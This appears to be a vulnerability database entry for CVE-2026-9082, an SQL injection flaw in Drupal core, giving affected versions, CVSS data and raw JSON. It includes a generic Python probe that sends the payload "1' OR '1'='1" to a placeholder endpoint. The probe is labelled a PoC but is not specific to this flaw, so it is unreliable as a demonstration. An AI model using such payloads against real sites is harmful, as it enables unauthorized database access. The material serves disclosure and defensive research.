Security Vulnerability Report
中文
CVE-2026-9082 CVSS 6.5 MEDIUM

CVE-2026-9082

Published: 2026-05-20 20:16:41
Last Modified: 2026-05-20 20:16:41
Source: [email protected]

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection. This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Drupal Core 8.9.0 至 10.4.10 之前版本
Drupal Core 10.5.0 至 10.5.10 之前版本
Drupal Core 10.6.0 至 10.6.9 之前版本
Drupal Core 11.0.0 至 11.1.10 之前版本
Drupal Core 11.2.0 至 11.2.12 之前版本
Drupal Core 11.3.0 至 11.3.10 之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Conceptual Proof of Concept for CVE-2026-9082 # This script demonstrates a potential SQL injection payload against a vulnerable Drupal endpoint. TARGET_URL = "http://example.com/drupal/vulnerable-endpoint" PAYLOAD = "1' OR '1'='1" # Basic SQL Injection test payload headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Send request with the injection payload response = requests.get(TARGET_URL, params={"id": PAYLOAD}, headers=headers, timeout=10) # Check if the response indicates a successful injection or database error if "syntax error" in response.text or "mysql_fetch" in response.text or response.status_code == 500: print("[+] Potential SQL Injection vulnerability detected!") elif response.elapsed.total_seconds() > 5: print("[+] Potential Time-Based Blind SQL Injection detected (significant delay).") else: print("[-] Vulnerability could not be confirmed with this payload.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9082", "sourceIdentifier": "[email protected]", "published": "2026-05-20T20:16:41.230", "lastModified": "2026-05-20T20:16:41.230", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection.\n\nThis issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.drupal.org/sa-core-2026-004", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.